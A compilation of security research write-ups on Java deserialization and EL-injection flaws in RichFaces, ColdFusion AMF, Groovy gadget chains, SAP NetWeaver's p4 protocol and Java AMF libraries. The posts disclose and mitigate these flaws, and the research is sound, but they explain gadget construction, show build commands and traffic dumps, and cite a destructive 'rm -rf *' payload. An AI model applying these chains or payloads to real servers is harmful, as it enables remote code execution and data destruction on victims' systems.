This vulnerability is a straight forward Java deserialization vulnerability. When a RichFaces 3.x resource is requested, it eventually gets processed by ResourceBuilderImpl.getResourceDataForKey(String). If the requested resource key begins with /DATA/, the remaining data gets decoded and decompressed (using ResourceBuilderImpl.decrypt(byte[]), which actually, despite its name, does not incorporate encryption[2]) and finally deserialized without any further validation.
In RichFaces 4.x, it is basically the same: the org.richfaces.resource.DefaultCodecResourceRequestData holds the request data passed via db/do and Util.decodeObjectData(String) is used in the latter case. That method then decodes and decompresses the data in a similar way and finally deserializes it without any further validation.
This can be exploited with ysoserial using a suitable gadget.
The arbitrary Java deserialization was patched in RichFaces 3.3.4 and 4.3.3 by introducing look-ahead deserialization with a limited set of whitelisted classes.[3] Due to several aftereffects, the list was extended occasionally.[4]
CVE-2015-0279: Arbitrary EL Evaluation
The RichFaces issue RF-13977 corresponding to this vulnerability is public and actually quite detailed. It describes that the RichFaces Showcase application utilizes the MediaOutputResource dynamic resource builder. The data object passed in the do URL parameter holds the state object, which is used by MediaOutputResource.restoreState(FacesContext, Object) to restore its state. This includes the contentProducer field, which is expected to be a MethodExpression object. That MethodExpression later gets invoked by MediaOutputResource.encode(FacesContext) to pass execution to the referenced method to generate the resource's contents. In the mentioned example, the EL method expression #{mediaBean.process} references the process method of a Java Bean named mediaBean.
Now the problem with that is that the EL expression can be changed, even just with basic Linux utilities. There is no protection in place that would prevent one from tampering with it. Depending on the EL implementation, this allows arbitrary code execution, as demonstrated by the reporter:
However, exploitation of this vulnerability is not always that easy. Especially if there is no existing sample of a valid do state object that can be tampered with. Because if one would want to create the state object, it would require the use of compatible libraries, otherwise the deserialization may fail. Moreover, the EL implementation does not allow arbitrary expressions with parameterized invocations in method expressions as this has only just been added in EL 2.2. EL exploitation is quite an interesting topic in itself.
The patch for this issue introduced in RichFaces 4.5.4 was to check the expression of the contentProducer whether it contains a parenthesis. This would prevent the invocation of methods with parameters like loadClass("java.lang.Runtime").
The Present
The kind of the past vulnerabilities led to the assumption that there may be a way to bypass the mitigations. And after some research, two ways were found to gain remote code execution in a similar manner also affecting the latest RichFaces versions 3.3.4 and 4.5.17:
RF-14310: Arbitrary EL Evaluation in RichFaces 3.x ≤ 3.3.4
Injection of arbitrary EL expressions allows remote code execution via org.richfaces.renderkit.html.Paint2DResource.
RF-14309: Arbitrary EL Evaluation in RichFaces 4.5.3 ≤ 4.5.17
Injection of arbitrary EL variable mapper allows to bypass mitigation of CVE-2015-0279 and thereby remote code execution.
Although the issues RF-14309 and RF-14310 were discovered in the order of their identifier, we'll explain them in the opposite order. Also note that the issues are not public but only visible to persons responsible to resolve security issues.
RF-14310: Arbitrary EL Evaluation
This vulnerability is very similar to CVE-2015-0279/RF-13799. While the injection of arbitrary EL expressions was possible right from the beginning, there is always a need to get them triggered somehow. This similarity was found in the org.richfaces.renderkit.html.Paint2DResource class. When a resource of that type gets requested, its send(ResourceContext) method gets called. The resource data transmitted in the request must be an org.richfaces.renderkit.html.Paint2DResource$ImageData object. This passes the whitelisting as ImageData extends org.ajax4jsf.resource.SerializableResource, which actually was introduced in 3.3.4 to fix the Java deserialization vulnerability.
RF-14309: Arbitrary EL Evaluation
As the patch to CVE-2015-0279 introduced in 4.5.4 disallowed the use of parenthesis in the EL method expression of the contentProducer, it seemed like a dead end. But if you are fimilar with EL internals, you would know that they can have custom function mappers and variable mappers, which are used by the ELResolver to resolve functions (i. e., name in ${prefix:name()}) and variables (i. e., var in ${var.property}) to Method and ValueExpression instances respectively. Fortunately, various VariableMapper implementations were added to the whitelist starting with 4.5.3.[5]
So to exploit this, all that is needed is to use a variable in the contentProducer method expression like ${dummy.toString} and add an appropriate VariableMapper to the method expression that maps dummy to a ValueExpression of your choice.
What will happen if a serious bug or security issue is discovered in the future?
There will be no patches after the end of support. In case of discovering a serious issue you will have to develop a patch yourself or switch to another framework.
The interesting thing about these classes is that they have a equals(Object) method, which eventually calls getType(ELContext) on a EL value expression. For example, if equals(Object) gets called on a ValueExpressionValueBindingAdapter object with a ValueExpression object as other, getType(ELContext) of other gets called. And as the value expression has to be evaluated to determine its resulting type, this can be used as a Java deserialization primitive to execute EL value expressions on deserialization.
This is very similar to the Myfaces1 and Myfaces2 gadgets in ysoserial.[6] However, while they require Apache MyFaces, this one is independent from the JSF implementation and only requires a matching EL implementation.
Unfortunately, this gadget does not work for RichFaces. The reason for that is that ValueExpressionValueBindingAdapter needs to have a valid value binding as getType(ELContext) gets called first. But javax.faces.el.ValueBinding is not whitelisted. And wrapping it in a StateHolderSaver does not work because the state object is of type Object[] and therefore the cast to Serializable[] in StateHolderSaver.restore(FacesContext) fails.[7] This is probably a bug in RichFaces as Serializable[] is not whitelisted either although StateHolderSaver uses Serializable[] internally on StateHolder instances.
Conclusion
It has been shown that all RichFaces versions 3.x and 4.x including the latest 3.3.4 and 4.5.17 are exploitable by one or multiple vulnerabilities:
RichFaces 3
3.1.0 ≤ 3.3.3: CVE-2013-2165
3.1.0 ≤ 3.3.4: RF-14310
RichFaces 4
4.0.0 ≤ 4.3.2: CVE-2013-2165
4.0.0 ≤ 4.5.4: CVE-2015-0279
4.5.3 ≤ 4.5.17: RF-14309
As we can't expect official patches, one way to mitigate all these vulnerabilities is to block requests to the concerned URLs:
Blocking requests of URLs with paths containing /DATA/ should mitigate CVE-2013-2165 and RF-14310.
Blocking requests of URLs with paths containing org.richfaces.resource.MediaOutputResource (literally or URL encoded) should mitigate CVE-2015-0279 and RF-14309.
7 This actually depends on the JSF API implementation and version. For example, org.jboss.spec.javax.faces/jboss-jsf-api_2.1_spec and org.glassfish/javax.faces do have this unfortunate behavior in all versions while com.sun.faces/jsf-api added it in version 2.1.0.
In a recent penetration test my teammate Thomas came across several servers running Adobe ColdFusion 11 and 12. Some of them were vulnerable to CVE-2017-3066 but no
outgoing TCP connections were possible to exploit the vulnerability. He asked me
whether I had an idea how he could still get a SYSTEM shell and the outcome of
the short research effort is documented here.
Introduction Adobe ColdFusion & AMF
Before we go into technical details, I will give you a short intro to Adobe ColdFusion (CF). Adobe ColdFusion is an Application Development Platform like ASP.net, however several years older. Adobe ColdFusion allows a developer to build websites, SOAP and REST web services and interact with Adobe Flash using the Action Message Format (AMF).
The AMF protocol is a custom binary serialization protocol. It has two formats, AMF0 and AMF3. An Action Message consists of headers and bodies.
Several data types are supported in AMF0 and AMF3.
For example the AMF3 format supports the following protocol elements with their type identifier:
Details about the binary message formats of AMF0 and AMF3 can be found on Wikipedia (see
https://en.wikipedia.org/wiki/Action_Message_Format).
There are several implementations for AMF in different languages.
For Java we have Adobe BlazeDS (now Apache BlazeDS), which is also used
in Adobe ColdFusion.
The BlazeDS AMF serializer can serialize complex object graphs.
The serializer starts with the root object and serializes its members
recursively.
Two general serialization techniques are supported by BlazeDS to serialize complex objects:
Serialization of Bean Properties (AMF0 and AMF3)
Serialization using Java's java.io.Externalizable interface. (AMF3)
Serialization of Bean Properties
This technique requires the object to be serialized to have a public no-arg
constructor and for every member public Getter-and Setter-Methods
(JavaBeans convention).
In order to collect all member values of an object, the AMF serializer invokes all
Getter-methods during serialization. The member names and values are put in the Action message
body with the class name of the object.
During deserialization, the classname is taken from the Action Message, a new
object is constructed and for every member name the corresponding set
method is called with the value as argument. This all happens either in
method readScriptObject() of class flex.messaging.io.amf.Amf3Input or
readObjectValue() of class flex.messaging.io.amf.Amf0Input.
Serialization using Java's java.io.Externalizable interface
BlazeDS further supports serialization of complex objects of classes implementing
the java.io.Externalizable interface which inherits from java.io.Serializable.
Every class implementing this interface needs to provide its own logic to deserialize
itself by calling methods on the java.io.ObjectInput-implementation to read serialized
primitive types and Strings (e.g. method read(byte[] paramArrayOfByte)).
During deserialization of an object (type 0xa) in AMF3, the method readScriptObject()
of class flex.messaging.io.amf.Amf3Input gets called.
In line #759 the method readExternalizable is invoked which
calls the readExternal() method on the object to be deserialized.
This should be sufficient to serve as an introduction to Adobe ColdFusion and AMF.
Previous work
Chris Gates (@Carnal0wnage) published the paper ColdFusion for Pentesters which is an excellent introduction to Adobe ColdFusion.
Wouter Coekaerts (@WouterCoekaerts) already showed in his blog post that deserializing untrusted AMF data is dangerous.
Looking at the history of Adobe ColdFusion vulnerabilities at Flexera/Secunia's database you can find mostly XSS', XXE's and information disclosures.
The most recent ones are:
Deserialization of untrusted data over RMI (CVE-2017-11283/4 by @nickstadb)
XXE (CVE-2017-11286 by Daniel Lawson of @depthsecurity)
XXE (CVE-2016-4264 by @dawid_golunski)
CVE-2017-3066
In 2017 Moritz Bechler of AgNO3 GmbH and my teammate Markus Wulftange discovered
independently the vulnerability CVE-2017-3066 in Apache BlazeDS.
The core problem of this vulnerability was that Adobe Coldfusion never did any
whitelisting of allowed classes.
Thus any class in the classpath of Adobe ColdFusion, which either fulfills the
Java Beans Convention or implements java.io.Externalizable could be sent to the server
and get deserialized.
Both Moritz and Markus found JRE classes (sun.rmi.server.UnicastRef2sun.rmi.server.UnicastRef) which implemented the java.io.Externalizable interface
and triggered an outgoing TCP connection during AMF3 deserialization.
After the connection was made to the attacker's server, its response was deserialized
using Java's native deserialization using
ObjectInputStream.readObject(). Both found a great "bridge" from AMF
deserialization to Java's native deserialization which offers well known
exploitation primitives using public gadgets.
Details about the vulnerability can also be found in Markus' blog post.
Apache introduced validation through the class
flex.messaging.validators.ClassDeserializationValidator.
It has a default whitelist but can also be configured with a configuration file.
For details see the Apache BlazeDS release notes.
Finding exploitation primitives before CVE-2017-3066
As already mentioned in the very beginning my teammate Thomas required an exploit
which also works without outgoing connection.
I had a quick look into the excellent research paper "Java Unmarshaller Security" of Moritz Bechler where he analysed several "Unmarshallers" including BlazeDS.
The exploitation payloads he discovered weren't applicable since the libraries
were missing in the classpath.
So I started with my typical approach, fired up my favorite "reverse engineering tool" when it comes to Java, Eclipse.
Eclipse together with the powerful decompiler plugin
"JD-Eclipse" (https://github.com/java-decompiler/jd-eclipse) is all you need for
static and dynamic analysis.
As a former Dev I was used to work with IDE's which make your life easier
and decompiling and grepping through code is often very inefficient and error prone.
So I created a new Java project and added all jar-files of Adobe Coldfusion 12
as external libraries.
The first idea was to look for further calls to Java's ObjectInputStream.readObject-method. Using Eclipse this is very easy.
Just open class ObjectInputStream, right click on the readObject() method and
click "Open Call Hierarchy". Thanks to JD-Eclipse and its decompiler, Eclipse is
able to construct call graphs based on class information without having any source.
The call graph looks big in the very beginning. But with some experience you
see very quickly which nodes in the graph are interesting.
After some hours I found two promising call graphs.
Setter-based Exploit
The first one starts with method setState(byte[] new_state) of class
org.jgroups.blocks.ReplicatedTree.
Looking at the implementation of this method, we already can imagine what is happening in line #605.
A quick look at the call graph confirms that we eventually end up in a call to ObjectInputStream.readObject().
The only thing to mention here is that the byte[] passed to setState()
needs to have an additional byte 0x2 at offset 0x0 as we can see from line 364
of class org.jgroups.util.Util.
The exploit can be found in the following image.
The exploit works against Adobe ColdFusion 12 only since JGroups is only
available in this specific version.
Externalizable-based Exploit
The second call graph starts in class org.apache.axis2.util.MetaDataEntry
with a call to readExternal which is what we are looking for.
In line #297 we have a call to SafeObjectInputStream.install(inObject).
In this function our AMF3Input instance gets wrapped by a
org.apache.axis2.context.externalize.SafeObjectInputStream
instance.
In line #341 a new instance of class
org.apache.axis2.context.externalize.ObjectInputStreamWithCL is created.
This class just extends the standard java.io.ObjectInputStream.
In line #342 we finally have our call to readObject().
The following image shows the request for the exploit.
The exploit works against Adobe ColdFusion 11 and 12.
ColdFusionPwn
To make your life easier I created the simple tool ColdFusionPwn. It works on the command line and allows you to generate the serialized AMF message. It incorporates Chris Frohoff's ysoserial for gadget generation. It can be found on our github.
Takeaways
Deserializing untrusted input is bad, that's for sure.
From an exploiters perspective exploiting deserialization vulnerabilities is
a challenging task since you need to find the "right" objects (gadgets) which trigger
functionality you can reuse for exploitation. But it's also more fun :-)
By the way: If you want to make a deep dive into serverside Java Exploitation and all sorts of deserialization
vulnerabilities and how to do proper static and dynamic analysis in Java,
you might be interested in our upcoming "Advanced Java Exploitation" course.
In Q4 2017 I was pentesting a customer. Shortly before, I had studied json attacks when I stumbled over an internet-facing B2B-portal-type-of-product written in Java they were using (I cannot disclose more details due to responsible disclosure). After a while, I found that one of the server responses sent a serialized Java object, so I downloaded the source code and found a way to make the server deserialize untrusted input. Unfortunately, there was no appropriate gadget available. However, they are using groovy-2.4.5 so when I saw [1] end of december on twitter, I knew I could pwn the target if I succeeded to write a gadget for groovy-2.4.5. This led to this blog post which is based on work by Sam Thomas [2], Wouter Coekaerts [3] and Alvaro Muñoz (pwntester) [4].
Be careful when you fix your readObject() implementation...
We'll start by exploring a popular mistake some developers made during the first mitigation attempts, after the first custom gadgets surfaced after the initial discovery of a vulnerability. Let's check out an example, the Jdk7u21 gadget. A brief recap of what it does: It makes use of a hashcode collision that occurs when a specially crafted instance of java.util.LinkedHashSet is deserialized (you need a string with hashcode 0 for this). It uses a java.lang.reflect.Proxy to create a proxied instance of the interface javax.xml.transform.Templates, with sun.reflect.annotation.AnnotationInvocationHandler as InvocationHandler. Ultimately, in an attempt to determine equality of the provided 2 objects the invocation handler calls all argument-less methods of the provided TemplatesImpl class which yields code execution through the malicious byte code inside the TemplatesImpl instance. For further details, check out what the methods AnnotationInvocationHandler.equalsImpl() and TemplatesImpl.newTransletInstance() do (and check out the links related to this gadget).
The following diagram, taken from [5], depicts a graphical overview of the architecture of the gadget.
So far, so well known.
In recent Java runtimes, there are in total 3 fixes inside AnnotationInvocationHandler which break this gadget (see epilogue). But let's start with the first and most obvious bug. The code below is from AnnotationInvocationHandler in Java version 1.7.0_21:
There is a try/catch around an attempt to get the proxied annotation type. But the proxied interface javax.xml.transform.Templates is not an annotation. This constitutes a clear case of potentially dangerous input that would need to be dealt with. However, instead of throwing an exception there is only a return statement inside the catch-branch. Fortunately for the attacker, the instance of the class is already fit for purpose and does not need the rest of the readObject() method in order to be able to do its malicious work. So the "return" is problematic and would have to be replaced by a throw new Exception of some sort.
Let's check how this method looks like in Java runtime 1.7.0_80:
Ok, so problem fixed? Well, yes and no. On the one hand, the use of the exception in the catch-clause will break the gadget which currently ships with ysoserial. On the other hand, this fix is a perfect example of the popular mistake I'm talking about. Wouter Coekaerts (see [3]) came up with an idea how to bypass such "fixes" and Alvaro Muñoz (see [4]) provided a gadget for JRE8u20 which utilizes this technique (in case you're wondering why there is no gadget for jdk1.7.0_80: 2 out of the total 3 fixes mentioned above are already incorporated into this version of the class. Even though it is possible to bypass fix number one, fix number two would definitely stop the attack).
Let's check out how this bypass works in detail.
A little theory
Let's recap what the Java (De-)Serialization does and what the readObject() method is good for. Let's take the example of java.util.HashMap. An instance of it contains data (key/value pairs) and structural information (something derived from the data) that allows logarithmic access times to your data. When serializing an instance of java.util.HashMap it would not be wise to fully serialize its internal representation. Instead it is completely sufficient to only serialize the data that is required to reconstruct its original state: Metadata (loadfactor, size, ...) followed by the key/value pairs as flat list. Let's have a look at the code:
As you can see, the method starts with a call to defaultReadObject. After that, the instance attributes loadFactor and threshold are initialized and can be used. The key/value pairs are located at the end of the serialized stream. Since the key/value pairs are contained as an unstructured flat list in the stream calling putVal(key,value) basically restores the internal structure, what allows to efficiently use them later on.
In general, it is fair to assume that many readObject() methods look like this:
Coming back to AnnotationInvocationHandler, we can see that its method readObject follows this pattern. Since the problem was located in the custom code section of the method, the fix was also applied there. In both versions, ObjectInputStream.defaultReadObject() is the first instruction. Now let's discuss why this is a problem and how the bypass works.
Handcrafted Gadgets
At work we frequently use ysoserial gadgets. I suppose that many readers are probably familiar with the ysoserial payloads and how these are created. A lot of Java reflection, a couple of fancy helper classes doing stuff like setting Fields, creating Proxy and Constructor instances. With "Handcrafted Gadgets" I meant gadgets of a different kind. Gadgets which cannot be created in the fashion ysoserial does (which is: create an instance of a Java object and serialize it). The gadgets I'm talking about are created by compiling a serialization stream manually, token by token. The result is something that can be deserialized but does not represent a legal Java class instance. If you would like to see an example, check out Alvaro's JRE8_20 gadget [4]. But let me not get ahead of myself, let's take a step back and focus on the problem I mentioned at the end of the last paragraph. The problem is that if the developer does not take care when fixing the readObject method, there might be a way to bypass that fix. The JRE8_20 gadget is an example of such a bypass. The original idea was, as already mentioned in the introduction, first described by Wouter Coekaerts [2]. It can be summarized as follows:
Idea
The fundamental insight is the fact that many classes are at least partly functional when the default attributes have been instantiated and propagated by the ObjectInputStream.defaultReadObject() method call. This is the case for AnnotationInvocationHandler (in older Java versions, more recent versions don't call this method anymore). The attacker does not need the readObject to successfully terminate, an object instance where the method ObjectInputStream.defaultReadObject() has executed is perfectly okay. However, it is definitely not okay from an attacker's perspective if readObject throws an exception, since, eventually this will break deserialization of the gadget completely. The second very important detail is the fact that if it is possible to suppress somehow the InvalidObjectException (to stick with the AnnotationInvocationHandler example) then it is possible to access the instance of AnnotationInvocationHandler later through references. During the deserialization process ObjectInputStream keeps a cache of various sorts of objects. When AnnotationInvocationHandler.readObject is called an instance of the object is available in that cache.
This brings the number of necessary steps to write the gadget down to two. Firstly, store the AnnotationInvocationHandler in the cache by somehow wrapping it such that the exception is suppressed. Secondly, build the original gadget, but replace the AnnotationInvocationHandler in it by a reference to the object located in the cache.
Now let's step through the detailed technical explanation.
If one thinks about object serialization and the fact that you can nest objects recursively it is clear that something like references must exist. Think about the following construct:
Here, the attribute a of class instance c points to an existing instance already serialized before and the serialized stream must reflect this somehow. When you look at a serialized binary stream you can immediately see the references: The hex representation usually looks like this:
71 00 7E AB CD
where AB CD is a short value which represents the array index of the referenced object in the cache. You can easily spot references in the byte stream since hex 71 is "q" and hex 7E is "~":
Wouter Coekaerts found the class java.beans.beancontext.BeanContextSupport. At some point during deserialization it does the following:
continue in the catch-branch, exactly what we need. So if we can build a serialized stream with an AnnotationInvocationHandler as first child of an instance of BeanContextSupport during deserialization we will end up in the catch (IOException ioe) branch and deserialization will continue.
Let's test this out. I will build a serialized stream with an illegal AnnotationInvocationHandler in it ("illegal" means that the type attribute is not an annotation) and we will see that the stream deserializes properly without throwing an exception. Here is what the structure of this stream will look like:
Once done, the deserialized object is a HashMap with one key/value pair, key is an instance of BeanContextSupport, value is "whatever".
Click here to see the code on github.com
You need to build Alvaro's project [6] to get the jar file necessary for building this:
kai@CodeVM:~/eworkspace/deser$ javac -cp /home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar BCSSerializationTest.java
kai@CodeVM:~/eworkspace/deser$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar BCSSerializationTest > 4blogpost
Writing java.lang.Class at offset 1048
Done writing java.lang.Class at offset 1094
Writing java.util.HashMap at offset 1094
Done writing java.util.HashMap at offset 1172
Adjusting reference from: 6 to: 8
Adjusting reference from: 6 to: 8
Adjusting reference from: 8 to: 10
Adjusting reference from: 9 to: 11
Adjusting reference from: 6 to: 8
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 17 to: 19
Adjusting reference from: 17 to: 19
kai@CodeVM:~/eworkspace/deser$
A little program that deserializes the created file and prints out the resulting object shows us this:
This concludes the first part, we successfully wrapped an instance of AnnotationInvocationHandler inside another class such that deserialization completes successfully.
Now we need to make that instance accessible. First we need to get hold of the cache. In order to do this, we need to debug. We set a breakpoint at the highlighted line in java.util.HashMap:
Then start the deserializer program and step into readObject:
When we open it we can see that number 24 is what we were looking for.
Here is one more interesting thing: If you deserialize with an older patch level of the Java Runtime, the object is initialized as can be seen in the sceenshot below:
If you use a more recent patch level like Java 1.7.0_151 you will see that the attributes memberValues and type are null. This is the effect of the third improvement in the class I've been talking about before. More recent versions don't call defaultReadObject at all, anymore. Instead, they first check if type is an annotation type and only after that they populate the default fields.
Let's do one more little exercise. In the program above in line 150, change
As you can see, the entry in the handles table can easily be referenced.
Now we'll leave the Jdk7u21 gadget and AnnotationInvocationHandler and build a gadget for groovy 2.4.5 using the techniques outlined above.
A deserialization gadget for groovy-2.4.5
Based on an idea of Sam Thomas (see [2]).
The original gadget for version 2.3.9 looks like this:
Trigger is readObject of our beloved AnnotationInvocationHandler, it will call entrySet of the memberValues hash map, which is a proxy class with invocation handler of type org.codehaus.groovy.runtime.ConvertedClosure. Now every invocation of ConvertedClosure will be delegated to doCall of the nested instance of MethodClosure which is a wrapper of the call to the groovy function execute. The OS command that will be executed is provided as member attribute to MethodClosure.
After the original gadget for version 2.3.9 showed up MethodClosure was fixed by adding a method readResolve to the class org.codehaus.groovy.runtime.MethodClosure:
If the global constant ALLOW_RESOLVE is not set to true an UnsupportedOperationException is supposed to break the deserialization. Basically, this means that an instance of MethodClosure cannot be deserialized anymore unless one explicitely enables it.
Let's quickly analyze MethodClosure: The class does not have a readObject method and readResolve is called after the default built-in deserialization. So when readResolve throws the exception the situation is almost identical to the one explained in the above paragraphs: An instance of MethodClosure is already in the handle table. But there is one important difference: AnnotationInvocationHandler throws an InvalidObjectException which is a child of IOException whereas readResolve throws an UnsupportedOperationException, which is a child of RuntimeException. BeanContextSupport, however, only catches IOException and ClassCastException. So the identical approach as outlined above would not work: The exception would not be caught. Fortunately, in late 2016 Sam Thomas found the class sun.security.krb5.KRBError which in its readObject method transforms every type of exception into IOException:
This means if we put KRBError in between BeanContextSupport and MethodClosure the UnsupportedOperationException will be translated into IOException which is ultimately caught inside the readChildren method of BeanContextSupport.
So our wrapper construct looks like this:
Some readers might be confused by the fact that you can nest an object of type MethodClosure inside a KRBError. Looking at the code and interface of the latter, there is no indication that this is possible. But it is important to keep in mind that what we are concerned with here are not Java objects! We are dealing with a byte stream that is deserialized. If you look again at the readObject method of KRBError you can see that this class calls ObjectInputStream.readObject() right away. So here, every serialized Java object will do fine. Only the cast to byte array will throw a ClassCastException, but remember: An exception will be thrown already before that and this is perfectly fine with the design of our exploit.
Now it is time to put the pieces together. The complete exploit consists of a hash map with one key/value pair, the BeanContextSupport is the key, the groovy gadget is the value. [1] suggests putting the BeanContextSupport inside the AnnotationInvocationHandler but it has certain advantages for debugging to use the hash map. Final structure looks like this:
The final exploit can be found on github.com.
I had mentioned 3 improvements in AnnotationInvocationHandler but I only provided one code snippet. For the sake of completeness, here are the two:
The second fix in jdk1.7.0_80 which already breaks the jdk gadget is a check in equalsImpl:
The highlighted check will filter out the methods getOutputProperties and newTransformer of TemplatesImpl because they are not considered annotation methods, and getMemberMethods returns an empty array so the methods of TemplatesImpl are never called and nothing happens.
The third fix which you can find for example in version 1.7.0_151 finally fixes readObject:
As one can see, only the 2 last calls actually set the member attributes type and memberValues. defeaultReadObject is not used at all. Before, the type check for the annotation class is performed. If it fails, an InvalidObjectException is thrown and type and memberValues remain null.
Code White have already an impressive publication record on Java Deserialization. This post is dedicated to a vulnerability in SAP NetWeaver Java. We could reach remote code execution through the p4 protocol and the Jdk7u21 gadget with certain engines and certain versions of the SAP JVM.
We would like to emphasize the big threat unauthenticated RCE poses to a SAP NetWeaver Java. An attacker with a remote shell can read out the secure storage, access the database, create a local NetWeaver user with administrative privileges, in other words, fully compromise the host. Unfortunately, this list is far from being complete. An SAP landscape is usually a network of tightly
connected servers and services. It wouldn’t be unusual that the database of the server stores technical users with high privileges for other SAP systems, be it NetWeaver ABAP or others. Once the attacker gets hold of credentials for those users she can extend her foothold in the organization and eventually compromise the entire SAP landscape.
We tested our exploit successfully on 7.20, 7.30 and 7.40 machines, for detailed version numbers see below. When contacted, SAP Product Security Response told us they published 3 notes (see [7], [8] and [9]) about updates fixing the problems (already in June 2013) with SAP JVM versions 1.5.0_086, 1.6.0_052 and 1.7.0_009 (we tested on earlier versions, see below). In addition SAP have recently adopted JDK JEP 290 (a Java enhancement that allows to filter incoming serialized data). However, neither do these three notes mention Java Deserialization nor is it obvious to the reader they relate to security in any other way.
Due to missing access to the SAP Service Marketplace we’re unable to make any statement about the aforementioned SAP JVM versions. We could only analyze the latest available SAP JVM from tools.hana.ondemand.com (see [6]) which contained a fix for the problem.
Details
In his RuhrSec Infiltrate 2016 talk, Code White’s former employee Matthias Kaiser already talked about SAP NetWeaver Java being vulnerable [2]. The work described here is completely independent of his research.
The natural entry point in this area is the p4 protocol. We found a p4 test client on SAP Collaboration Network and sniffed the traffic. One doesn’t need to wait long until a serialized object is sent over the wire:
00000000 76 31 v1 00000002 18 23 70 23 34 4e 6f 6e 65 3a 31 32 37 2e 30 2e .#p#4Non e:127.0. 00000012 31 2e 31 3a 35 39 32 35 36 1.1:5925 6
00000000 76 31 19 23 70 23 34 4e 6f 6e 65 3a 31 30 2e 30 v1.#p#4N one:10.0 00000010 2e 31 2e 31 38 34 3a 35 30 30 30 34 .1.184:5 0004
The highlighted part is just the java.lang.String object “ClientIDPropagator”.
Now our plan was to replace this serialized object by a ysoserial payload. Therefore, we needed to
find out how the length of such a message block is encoded.
When we look at offset 0000005E, for instance, the 00 00 75 00 looks like 2 header null bytes and
then a length in little endian format. Hex 75 is 117, but the total length of the last block is 8*16+3 =
131. If one looks at the blocks the client sent before (at offset 0000001B and 0000003A) one can
easily spot that the real length of the block is always 14 more than what is actually sent. This lead to
the first conclusion: a message block consists of 2 null bytes, 2 bytes length of the payload in little
endian format, then 10 bytes of some (not understood) header information, then the payload:
When running the test client several times and by spotting the messages carefully enough one can see that the payload and header aren’t static: They use 2 4-bytes words sent in the second reply from
the server:
That was enough to set up a first small python program: Send the corresponding byte arrays in the right order, read the replies from the network, set the 4 byte words accordingly and replace “ClientIDPropagator” by the ysoserial Jdk7u21 gadget.
Unfortunately, this didn’t work out at first. A bit later we realized that SAP NetWeaver Java obviously didn’t serialize with the plain vanilla Java ObjectOutputStream but with a custom serializer. After twisting and tweaking a bit we were finally successful. Details are left to the reader ;-)
To demonstrate how dangerous this is we have published a disarmed exploit on github [5]. Instead of using a payload that writes a simple file to the current directory (e.g. cw98653.txt with contents "VULNERABLE"), like we did, an attacker can also add bytecode that runs Runtime.getRuntime().exec("rm -rf *") or establish a remote shell on the system and thereby compromise the system or in the worst case even parts of the SAP landscape.
We could successfully verify this exploit on the following systems:
SAP Application Server Java 7.20 with SAPJVM 1.6.0_07 (build 007)
SAP Application Server Java 7.30 with SAPJVM 1.6.0_23 (build 034)
SAP Application Server Java 7.40 with SAPJVM 1.6.0_43 (build 048)
After SAP Product Security’s response, we downloaded SAPJVM 1.6.0_141 build 99 from [6] and indeed, the AnnotationInvocationHandler, which is at the core of theJdk7u21 gadget exploits, was patched. So, with that version, the JdkGadget cannot be used anymore for exploitation.
However, since staying up-to-date with modern software product release cycles is a big challenge for customers and the corresponding SAP notes do not explicitely bring the reader’s attention to a severe security vulnerability, we’d like to raise awareness that not updating the SAP JVM can expose their SAP systems to serious threats.
AMF is a binary serialization format primarily used by Flash applications. Code White has found that several Java AMF libraries contain vulnerabilities, which result in unauthenticated remote code execution. As AMF is widely used, these vulnerabilities may affect products of numerous vendors, including Adobe, Atlassian, HPE, SonicWall, and VMware.
Vulnerability disclosure has been coordinated with US CERT (see US CERT VU#307983).
Summary
Code White has analyzed the following popular Java AMF implementations:
Each of these have been found to be affected by one or more of the following vulnerabilities:
XML external entity resolution (XXE)
Creation of arbitrary objects and setting of properties
Java Deserialization via RMI
The former two vulnerabilities are not completely new.1 But we found that other implementations are also vulnerable. Finally, a way to turn a design flaw common to all implementations into a Java deserialization vulnerability has been discovered.
The Action Message Format version 3 (AMF3) is a binary message format mainly used by Flash applications for communicating with the back end. Like JSON, it supports different kind of basic data types. For backwards compatibility, AMF3 is implemented as an extension of the original AMF (often referred to as AMF0), with AMF3 being a newly introduced AMF0 object type.
One of the new features of AMF3 objects is the addition of two certain characteristics, so called traits:
[…] ActionScript 3.0 introduces two further traits to describe how objects are serialized, namely 'dynamic' and 'externalizable'. The following table outlines the terms and their meanings:
[…]
Dynamic: an instance of a Class definition with the dynamic trait declared; public variable members can be added and removed from instances dynamically at runtime
Externalizable: an instance of a Class that implements flash.utils.IExternalizable and completely controls the serialization of its members (no property names are included in the trait information).
Let's elaborate on these new traits, especially on how these are implemented and the resulting implications.
The Dynamic Trait
The dynamic trait is comparable to JavaBeans functionality: it allows the creation of an object by specifying its class name and its properties by name and value. And actually, many implementations use existing JavaBeans utilities such as the java.beans.Introspector (e. g., Flamingo, Flex BlazeDS, WebORB) or they implement their own introspector with similar functionality (e. g., GraniteDS).
The externalizable trait is comparable to Java's java.io.Externalizable interface. And in fact, all mentioned library vendors actually interpreted the flash.utils.IExternalizable interface from the specification as being equivalent to Java's java.io.Externalizable, effectively allowing the reconstruction of any class implementing the java.io.Externalizable interface.
Short excursion regarding the different between java.io.Serializable and java.io.Externalizable: if you look at the java.io.Serializable interface, you'll see it is empty. So there are no formal contracts that can be enforced at build time by the compiler. But classes implementing the java.io.Serializable interface have the option to override the default serialization/deserialization by implementing various methods. That means there are a lot of additional checks during runtime whether an actual object implements one of these opt-in methods, which makes the whole process bloated and slow.
Therefore, the java.io.Externalizable interface was introduced, which specifies two methods, readExternal(java.io.ObjectInput) and writeExternal(java.io.ObjectInput), that give the class complete control over the serialization/deserialization. This means no default serialization/deserialization behavior, no additional checks during runtime, no magic. That makes serialization/deserialization using java.io.Externalizable much simpler and thus faster than using java.io.Serializable.
But now let's get back on track.
Turning Externalizable.readExternal into ObjectInputStream.readObject
In OpenJDK 8u121, there are 15 classes implementing the java.io.Externalizable and most of them only do boring stuff like reconstructing an object's state. Additionally, the actual instances of the java.io.ObjectInput passed to Externalizable.readExternal(java.io.ObjectInput) methods of the implementations are also not an instance of java.io.ObjectInputStream. So no quick win here.
